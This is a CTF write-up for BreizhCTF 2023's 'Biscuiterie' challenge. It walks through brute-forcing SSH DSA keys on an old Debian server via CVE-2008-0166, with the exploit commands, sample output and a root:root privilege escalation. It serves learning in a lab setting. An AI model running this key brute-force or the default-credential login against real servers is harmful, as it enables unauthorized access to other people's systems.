Zeecka zeecka

Biscuiterie

BreizhCTF 2023 - Pentest

BreizhCTF 2023 - Biscuiterie

Challenge details

EventChallengeCategoryPointsSolves
BreizhCTF 2023BiscuiterieCryptography??????

biscuit

Owen is the administrator of the famous Breton biscuit factory ‘Le Poti Beurre’ founded in 1866. Due to a lack of budget, the IT infrastructure is as old as the company, and Owen’s administration machine died this morning. Help Owen regain control of the biscuit production server.

Here is some information to help you with your task:

  • Owen administered his servers over SSH under the username owen;
  • Not being a big fan of passwords, Owen used “secure” SSH keys for each of his servers;
  • The biscuit factory’s production server is an old Debian server.

Author: Zeecka

ssh -p 30010 challenge.ctf.bzh

TL;DR

The ssh server is vulnerable to CVE-2008-0166, which allows an attacker to bruteforce the SSH keys in an optimized way.

Methodology

First, we retrieve the version of the biscuit factory’s SSH server;

$ nc biscuiterie.ctf.bzh 22

SSH-1.99-OpenSSH_4.6

When attempting to connect with the user owen, we get a first error:

$ ssh owen@biscuiterie.ctf.bzh

Unable to negotiate with biscuiterie.ctf.bzh port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

This error is related to our SSH client version being too recent to support the ssha-rsa and ssh-dss formats. DSS being the key format for DSA, we will add the support options for ssh-dss to our client.

$ ssh -oHostKeyAlgorithms=+ssh-dss -oPubkeyAcceptedAlgorithms=+ssh-dss owen@biscuiterie.ctf.bzh

owen@127.0.0.1: Permission denied (publickey).

On the first attempt, an error related to the known_hosts file may appear.

We can confirm that the server requires key-based authentication only, since no password is requested.

A search with the following keywords leads to CVE-2008-0166.

  • OpenSSH 4.6
  • Vulnerability
  • Exploit
  • DSA
  • Key

The CVE description indicates that an attacker can perform a bruteforce attack on SSH keys due to a problem related to key generation.

Many exploits are available across the web; we will go with the github repository of g0tmi1k which provides the complete list of DSA 1024 keys for vulnerable Debian servers. The repository also contains links to exploit scripts in several languages; we will use the exploit written in python 2.

All that’s left is to run the exploit, specifying the correct user, the directory containing the various possible keys, and the vulnerable server. A modification of the script may be necessary to add the -oHostKeyAlgorithms=+ssh-dss -oPubkeyAcceptedAlgorithms=+ssh-dss options (l.69 next to -o PasswordAuthentication=no).

$ python exploit.py ./dsa/1024 biscuiterie.ctf.bzh owen

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
Tested 163 keys | Remaining 32605 keys | Aprox. Speed 32/sec
Tested 332 keys | Remaining 32436 keys | Aprox. Speed 33/sec
...
Key Found in file: ff4602062c7d74bef8830c3e850c5022-10350
Execute: ssh -lowen -p22 -i ./dsa/1024/ff4602062c7d74bef8830c3e850c5022-10350 biscuiterie.ctf.bzh

We can then connect with the following ssh command:

$ ssh -l owen -oHostKeyAlgorithms=+ssh-dss -oPubkeyAcceptedAlgorithms=+ssh-dss -i ./dsa/1024/ff4602062c7d74bef8830c3e850c5022-10350 biscuiterie.ctf.bzh

$ cat flag_user.txt

Préparation : 20min
Cuisson : 10min

1. Mélanger le beurre et le sucre.
   Ajouter l’oeuf et mélanger.
   Ajouter ensuite toute la farine d'un coup et malaxer à la main.

2. Réserver la pâte au frais, emballée dans un film alimentaire pendant au moins 1 heure.

------

Flag (part 1/2): BZHCTF{75%_de_Beurre_

Privilege escalation is then done using the weak credentials root:root:

$ su root

# cat flag_root.txt

3. Etaler au rouleau sur un plan de travail fariné sur une épaisseur de 5 mm environ.
   Utiliser des emporte-pièces pour faire les découpes.

4. Enfourner pendant 10 à 12 minutes à 180°C sur une plaque recouverte de papier cuisson.

5. Placer aussitôt les sablés sur une grille pour les faire refroidir. 
   Les sablés se conservent longtemps dans une boîte en métal hermétique.

------

Flag (part 1/2): et_75%_de_Sucre}

Flag

BZHCTF{75%_de_Beurre_et_75%_de_Sucre}

Author: Zeecka